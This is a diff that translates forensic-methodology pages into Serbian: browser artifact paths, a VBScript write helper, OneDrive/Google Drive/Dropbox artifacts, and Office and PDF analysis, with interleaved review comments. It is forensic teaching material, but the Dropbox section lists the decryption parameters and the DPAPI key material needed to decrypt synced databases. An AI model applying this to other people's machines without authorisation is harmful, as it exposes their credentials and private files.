+- **Bookmarks**: Korisničke oznake. +- **Web Data**: Sadrži istoriju obrazaca. +- **Favicons**: Čuva favicon-e sajtova. +- **Login Data**: Uključuje podatke za prijavu kao što su korisnička imena i lozinke. +- **Current Session**/**Current Tabs**: Podaci o trenutnoj sesiji pretraživanja i otvorenim karticama. +- **Last Session**/**Last Tabs**: Informacije o sajtovima aktivnim tokom poslednje sesije pre nego što je Chrome zatvoren. +- **Extensions**: Direktorijumi za ekstenzije i dodatke pretraživača. +- **Thumbnails**: Čuva sličice sajtova. 
+- **Preferences**: Datoteka bogata informacijama, uključujući podešavanja za dodatke, ekstenzije, iskačuće prozore, obaveštenja i još mnogo toga. +- **Browser’s built-in anti-phishing**: Da biste proverili da li su zaštita od phishing-a i zaštita od malvera omogućene, pokrenite `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Potražite `{"enabled: true,"}` u izlazu. ## **SQLite DB Data Recovery** -As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). +Kao što možete primetiti u prethodnim odsecima, i Chrome i Firefox koriste **SQLite** baze podataka za čuvanje podataka. Moguće je **oporaviti obrisane unose koristeći alat** [**sqlparse**](https://github.com/padfoot999/sqlparse) **ili** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). ## **Internet Explorer 11** -Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management. +Internet Explorer 11 upravlja svojim podacima i metapodacima na različitim lokacijama, pomažući u razdvajanju sačuvanih informacija i njihovih odgovarajućih detalja za lak pristup i upravljanje. ### Metadata Storage -Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. 
This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype. +Metapodaci za Internet Explorer čuvaju se u `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (gde je VX V01, V16 ili V24). Pored toga, datoteka `V01.log` može pokazati razlike u vremenu modifikacije sa `WebcacheVX.data`, što ukazuje na potrebu za popravkom koristeći `esentutl /r V01 /d`. Ovi metapodaci, smešteni u ESE bazi podataka, mogu se oporaviti i pregledati koristeći alate kao što su photorec i [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html). Unutar tabele **Containers**, može se razaznati specifične tabele ili kontejneri gde je svaki segment podataka smešten, uključujući detalje o kešu za druge Microsoft alate kao što je Skype. ### Cache Inspection -The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times. +Alat [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) omogućava inspekciju keša, zahtevajući lokaciju foldera za ekstrakciju podataka iz keša. Metapodaci za keš uključuju ime datoteke, direktorijum, broj pristupa, URL izvor i vremenske oznake koje označavaju vreme kreiranja, pristupa, modifikacije i isteka keša. ### Cookies Management -Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. 
Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory. +Kolačići se mogu istraživati koristeći [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), sa metapodacima koji obuhvataju imena, URL-ove, brojeve pristupa i razne vremenske detalje. Trajni kolačići se čuvaju u `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, dok se sesijski kolačići nalaze u memoriji. ### Download Details -Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. +Metapodaci o preuzimanjima su dostupni putem [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), sa specifičnim kontejnerima koji sadrže podatke kao što su URL, tip datoteke i lokacija preuzimanja. Fizičke datoteke se mogu naći pod `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. ### Browsing History -To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`. +Za pregled istorije pretraživanja, može se koristiti [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html), zahtevajući lokaciju ekstraktovanih datoteka istorije i konfiguraciju za Internet Explorer. Metapodaci ovde uključuju vremena modifikacije i pristupa, zajedno sa brojevima pristupa. Datoteke istorije se nalaze u `%userprofile%\Appdata\Local\Microsoft\Windows\History`. 
### Typed URLs -Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times. +Otucani URL-ovi i njihova vremena korišćenja čuvaju se unutar registra pod `NTUSER.DAT` na `Software\Microsoft\InternetExplorer\TypedURLs` i `Software\Microsoft\InternetExplorer\TypedURLsTime`, prateći poslednjih 50 URL-ova koje je korisnik uneo i njihova poslednja vremena unosa. ## Microsoft Edge -Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are: +Microsoft Edge čuva korisničke podatke u `%userprofile%\Appdata\Local\Packages`. Putanje za različite tipove podataka su: - **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC` - **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat` 
@@ -143,24 +133,24 @@ Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The p ## Safari -Safari data is stored at `/Users/$User/Library/Safari`. Key files include: +Safari podaci se čuvaju na `/Users/$User/Library/Safari`. Ključne datoteke uključuju: -- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query. -- **Downloads.plist**: Information about downloaded files. -- **Bookmarks.plist**: Stores bookmarked URLs. -- **TopSites.plist**: Most frequently visited sites. -- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve. -- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse. -- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse. -- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active. +- **History.db**: Sadrži tabele `history_visits` i `history_items` sa URL-ovima i vremenskim oznakama poseta. Koristite `sqlite3` za upite. +- **Downloads.plist**: Informacije o preuzetim datotekama. +- **Bookmarks.plist**: Čuva URL-ove oznaka. +- **TopSites.plist**: Najčešće posećeni sajtovi. +- **Extensions.plist**: Lista ekstenzija pretraživača Safari. Koristite `plutil` ili `pluginkit` za preuzimanje. +- **UserNotificationPermissions.plist**: Domeni kojima je dozvoljeno slanje obaveštenja. Koristite `plutil` za analizu. +- **LastSession.plist**: Kartice iz poslednje sesije. Koristite `plutil` za analizu. +- **Browser’s built-in anti-phishing**: Proverite koristeći `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. Odgovor 1 označava da je funkcija aktivna. ## Opera -Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads. 
+Opera podaci se nalaze u `/Users/$USER/Library/Application Support/com.operasoftware.Opera` i deli format Chrome-a za istoriju i preuzimanja. -- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`. +- **Browser’s built-in anti-phishing**: Proverite tako što ćete proveriti da li je `fraud_protection_enabled` u datoteci Preferences postavljeno na `true` koristeći `grep`. -These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers. +Ove putanje i komande su ključne za pristup i razumevanje podataka o pretraživanju koje čuvaju različiti web pretraživači. ## References @@ -169,12 +159,4 @@ These paths and commands are crucial for accessing and understanding the browsin - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index c22a6f566..ab6437275 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md 
@@ -1,50 +1,42 @@ {{#include ../../../banners/hacktricks-training.md}} -Some things that could be useful to debug/deobfuscate a malicious VBS file: +Neke stvari koje bi mogle biti korisne za debagovanje/deobfuskaciju zlonamernog VBS fajla: ## echo - ```bash Wscript.Echo "Like this?" ``` - -## Commnets - +## Komentari ```bash ' this is a comment ``` - ## Test - ```bash cscript.exe file.vbs ``` - -## Write data to a file - +## Napišite podatke u datoteku ```js Function writeBinary(strBinary, strPath) - Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") +Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") - ' below lines purpose: checks that write access is possible! - Dim oTxtStream +' below lines purpose: checks that write access is possible! +Dim oTxtStream - On Error Resume Next - Set oTxtStream = oFSO.createTextFile(strPath) +On Error Resume Next +Set oTxtStream = oFSO.createTextFile(strPath) - If Err.number <> 0 Then MsgBox(Err.message) : Exit Function - On Error GoTo 0 +If Err.number <> 0 Then MsgBox(Err.message) : Exit Function +On Error GoTo 0 - Set oTxtStream = Nothing - ' end check of write access +Set oTxtStream = Nothing +' end check of write access - With oFSO.createTextFile(strPath) - .Write(strBinary) - .Close - End With +With oFSO.createTextFile(strPath) +.Write(strBinary) +.Close +End With End Function ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md index f64869c3c..ea6097f05 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md 
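Review bot: the VBScript body of `writeBinary` in `desofuscation-vbs-cscript.exe.md` lost its indentation in the translated lines (`+Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")`, `+.Write(strBinary)`, `+.Close`), and the blank lines between each heading and its fence were dropped; a translation commit should leave code blocks byte-identical to the source, so restore the original leading whitespace and blank lines. The fence is tagged `js` although the body is VBScript; that predates this change, but it is worth correcting while the block is being touched.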
@@ -1,114 +1,97 @@ -# Local Cloud Storage +# Lokalna Cloud Skladišta {{#include ../../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %} ## OneDrive -In Windows, you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files: +U Windows-u, možete pronaći OneDrive folder u `\Users\\AppData\Local\Microsoft\OneDrive`. I unutar `logs\Personal` moguće je pronaći datoteku `SyncDiagnostics.log` koja sadrži neke zanimljive podatke o sinhronizovanim datotekama: -- Size in bytes -- Creation date -- Modification date -- Number of files in the cloud -- Number of files in the folder -- **CID**: Unique ID of the OneDrive user -- Report generation time -- Size of the HD of the OS +- Veličina u bajtovima +- Datum kreiranja +- Datum modifikacije +- Broj datoteka u cloudu +- Broj datoteka u folderu +- **CID**: Jedinstveni ID OneDrive korisnika +- Vreme generisanja izveštaja +- Veličina HD operativnog sistema -Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files synchronized with OneDrive. +Kada pronađete CID, preporučuje se da **pretražujete datoteke koje sadrže ovaj ID**. Možda ćete moći da pronađete datoteke sa imenom: _**\.ini**_ i _**\.dat**_ koje mogu sadržati zanimljive informacije kao što su imena datoteka sinhronizovanih sa OneDrive. 
## Google Drive -In Windows, you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\ -This folder contains a file called Sync_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5. +U Windows-u, možete pronaći glavni Google Drive folder u `\Users\\AppData\Local\Google\Drive\user_default`\ +Ovaj folder sadrži datoteku pod nazivom Sync_log.log sa informacijama kao što su email adresa naloga, imena datoteka, vremenski oznake, MD5 heševi datoteka, itd. Čak i obrisane datoteke se pojavljuju u toj log datoteci sa odgovarajućim MD5. -The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files. +Datoteka **`Cloud_graph\Cloud_graph.db`** je sqlite baza podataka koja sadrži tabelu **`cloud_graph_entry`**. U ovoj tabeli možete pronaći **ime** **sinhronizovanih** **datoteka**, vreme modifikacije, veličinu i MD5 kontrolni zbir datoteka. -The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version. +Podaci tabele baze podataka **`Sync_config.db`** sadrže email adresu naloga, putanju deljenih foldera i verziju Google Drive-a. ## Dropbox -Dropbox uses **SQLite databases** to manage the files. In this\ -You can find the databases in the folders: +Dropbox koristi **SQLite baze podataka** za upravljanje datotekama. 
U ovom\ +Možete pronaći baze podataka u folderima: - `\Users\\AppData\Local\Dropbox` - `\Users\\AppData\Local\Dropbox\Instance1` - `\Users\\AppData\Roaming\Dropbox` -And the main databases are: +A glavne baze podataka su: - Sigstore.dbx - Filecache.dbx - Deleted.dbx - Config.dbx -The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]()) +Ekstenzija ".dbx" znači da su **baze podataka** **enkriptovane**. Dropbox koristi **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]()) -To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). +Da biste bolje razumeli enkripciju koju Dropbox koristi, možete pročitati [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html). 
-However, the main information is: +Međutim, glavne informacije su: -- **Entropy**: d114a55212655f74bd772e37e64aee9b -- **Salt**: 0D638C092E8B82FC452883F95F355B8E -- **Algorithm**: PBKDF2 -- **Iterations**: 1066 +- **Entropija**: d114a55212655f74bd772e37e64aee9b +- **So**: 0D638C092E8B82FC452883F95F355B8E +- **Algoritam**: PBKDF2 +- **Iteracije**: 1066 -Apart from that information, to decrypt the databases you still need: +Pored tih informacija, da biste dekriptovali baze podataka, još uvek vam je potrebno: -- The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary) -- The **`SYSTEM`** and **`SECURITY`** hives -- The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect` -- The **username** and **password** of the Windows user +- **enkriptovani DPAPI ključ**: Možete ga pronaći u registru unutar `NTUSER.DAT\Software\Dropbox\ks\client` (izvezite ove podatke kao binarne) +- **`SYSTEM`** i **`SECURITY`** hives +- **DPAPI master ključevi**: Koji se mogu pronaći u `\Users\\AppData\Roaming\Microsoft\Protect` +- **korisničko ime** i **lozinka** Windows korisnika -Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:** +Zatim možete koristiti alat [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:** ![](<../../../images/image (443).png>) -If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt]() putting the primary key as the "passphrase" inside the receipt. - -The resulting hex is the final key used to encrypt the databases which can be decrypted with: +Ako sve prođe kako se očekuje, alat će označiti **primarni ključ** koji treba da **koristite za oporavak originalnog**. 
Da biste povratili originalni, jednostavno koristite ovaj [cyber_chef recept]() stavljajući primarni ključ kao "lozinku" unutar recepta. +Rezultantni heksadecimalni broj je konačni ključ koji se koristi za enkripciju baza podataka koje se mogu dekriptovati sa: ```bash sqlite -k config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db ``` +**`config.dbx`** baza podataka sadrži: -The **`config.dbx`** database contains: +- **Email**: Email korisnika +- **usernamedisplayname**: Ime korisnika +- **dropbox_path**: Putanja gde se nalazi dropbox folder +- **Host_id: Hash** korišćen za autentifikaciju u cloud. Ovo se može opozvati samo sa veba. +- **Root_ns**: Identifikator korisnika -- **Email**: The email of the user -- **usernamedisplayname**: The name of the user -- **dropbox_path**: Path where the dropbox folder is located -- **Host_id: Hash** used to authenticate to the cloud. This can only be revoked from the web. -- **Root_ns**: User identifier +**`filecache.db`** baza podataka sadrži informacije o svim datotekama i folderima sinhronizovanim sa Dropbox-om. Tabela `File_journal` je ona sa više korisnih informacija: -The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information: +- **Server_path**: Putanja gde se datoteka nalazi unutar servera (ova putanja je prethodna sa `host_id` klijenta). +- **local_sjid**: Verzija datoteke +- **local_mtime**: Datum modifikacije +- **local_ctime**: Datum kreiranja -- **Server_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client). 
-- **local_sjid**: Version of the file -- **local_mtime**: Modification date -- **local_ctime**: Creation date +Ostale tabele unutar ove baze sadrže zanimljivije informacije: -Other tables inside this database contain more interesting information: - -- **block_cache**: hash of all the files and folders of Dropbox -- **block_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal` -- **mount_table**: Share folders of dropbox -- **deleted_fields**: Dropbox deleted files +- **block_cache**: hash svih datoteka i foldera Dropbox-a +- **block_ref**: Povezuje hash ID tabele `block_cache` sa ID datoteke u tabeli `file_journal` +- **mount_table**: Deljeni folderi Dropbox-a +- **deleted_fields**: Obrišene datoteke Dropbox-a - **date_added** -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md index 2e07c739d..f736ecd16 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md @@ -1,36 +1,18 @@ -# Office file analysis +# Analiza Office datoteka {{#include ../../../banners/hacktricks-training.md}} -
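Review bot: in `local-cloud-storage.md` the dangling fragment "In this\" from the source was carried over literally as "U ovom\", so the Dropbox paragraph still breaks mid-sentence in the translation; either drop the fragment or flag it for the English source. Two wording points in the same hunk: "Obrišene datoteke Dropbox-a" should be "Obrisane datoteke" (the hunk itself spells it "obrisane" in the Google Drive paragraph), and "ova putanja je prethodna sa `host_id` klijenta" misrenders "preceded by"; "ovoj putanji prethodi `host_id` klijenta" keeps the meaning. The blank line between the closing fence of the `sqlite -k config.dbx` snippet and "**`config.dbx`** baza podataka sadrži:" was also removed, so the list now hangs directly off the code block.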
+Za više informacija proverite [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Ovo je samo sažetak: -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Microsoft je kreirao mnoge formate office dokumenata, pri čemu su dva glavna tipa **OLE formati** (kao što su RTF, DOC, XLS, PPT) i **Office Open XML (OOXML) formati** (kao što su DOCX, XLSX, PPTX). Ovi formati mogu uključivati makroe, što ih čini metama za phishing i malver. OOXML datoteke su strukturirane kao zip kontejneri, što omogućava inspekciju kroz raspakivanje, otkrivajući hijerarhiju datoteka i foldera i sadržaj XML datoteka. -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %} +Da bi se istražile strukture OOXML datoteka, data je komanda za raspakivanje dokumenta i struktura izlaza. Tehnike za skrivanje podataka u ovim datotekama su dokumentovane, što ukazuje na kontinuiranu inovaciju u skrivanju podataka unutar CTF izazova. -For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary: - -Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents. - -To explore OOXML file structures, the command to unzip a document and the output structure are given. 
Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges. - -For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables. - -Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`. +Za analizu, **oletools** i **OfficeDissector** nude sveobuhvatne alate za ispitivanje kako OLE tako i OOXML dokumenata. Ovi alati pomažu u identifikaciji i analizi ugrađenih makroa, koji često služe kao vektori za isporuku malvera, obično preuzimajući i izvršavajući dodatne zlonamerne pakete. Analiza VBA makroa može se izvršiti bez Microsoft Office-a korišćenjem Libre Office-a, koji omogućava debagovanje sa tačkama prekida i posmatranim promenljivama. +Instalacija i korišćenje **oletools** su jednostavni, sa komandama za instalaciju putem pip-a i vađenje makroa iz dokumenata. Automatsko izvršavanje makroa se pokreće funkcijama kao što su `AutoOpen`, `AutoExec` ili `Document_Open`. ```bash sudo pip3 install -U oletools olevba -c /path/to/document #Extract macros ``` - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md index 769407b3a..a3ba0256f 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md @@ -1,28 +1,20 @@ -# PDF File analysis +# PDF analiza {{#include ../../../banners/hacktricks-training.md}} -
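Review bot: in `office-file-analysis.md` "additional malicious payloads" became "dodatne zlonamerne pakete" (packages), which loses the term; "zlonamerni sadržaj (payload)" is closer. The blank lines around the bash fence were also dropped in this hunk, so the "Instalacija i korišćenje **oletools**" paragraph runs straight into the ``` line; keep the source's blank lines so the translated page renders like the original.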
+**Za više detalja proverite:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pdf-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +PDF format je poznat po svojoj složenosti i potencijalu za prikrivanje podataka, što ga čini centralnom tačkom za CTF forenzičke izazove. Kombinuje elemente običnog teksta sa binarnim objektima, koji mogu biti kompresovani ili enkriptovani, i može uključivati skripte u jezicima kao što su JavaScript ili Flash. Da bi se razumeo PDF struktura, može se konsultovati Didier Stevensov [uvodni materijal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), ili koristiti alati poput tekstualnog editora ili PDF-specifičnog editora kao što je Origami. -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pdf-file-analysis" %} +Za dubinsko istraživanje ili manipulaciju PDF-ova, dostupni su alati poput [qpdf](https://github.com/qpdf/qpdf) i [Origami](https://github.com/mobmewireless/origami-pdf). Sakriveni podaci unutar PDF-ova mogu biti prikriveni u: -**For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/) +- Nevidljivim slojevima +- XMP metapodacima formata od Adobe-a +- Inkrementalnim generacijama +- Tekstu iste boje kao pozadina +- Tekstu iza slika ili preklapajućih slika +- Neprikazanim komentarima -The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. 
To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami. - -For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in: - -- Invisible layers -- XMP metadata format by Adobe -- Incremental generations -- Text with the same color as the background -- Text behind images or overlapping images -- Non-displayed comments - -For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject. +Za prilagođenu analizu PDF-a, Python biblioteke poput [PeepDF](https://github.com/jesparza/peepdf) mogu se koristiti za izradu specijalizovanih skripti za parsiranje. Pored toga, potencijal PDF-a za skladištenje skrivenih podataka je toliko veliki da resursi poput NSA vodiča o rizicima i protivmera vezanim za PDF, iako više nisu dostupni na svojoj originalnoj lokaciji, i dalje nude dragocene uvide. 
[Kopija vodiča](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) i kolekcija [trikova za PDF format](https://github.com/corkami/docs/blob/master/PDF/PDF.md) od Ange Albertinija mogu pružiti dodatno čitanje na ovu temu. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 6108df028..d341f989e 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md 
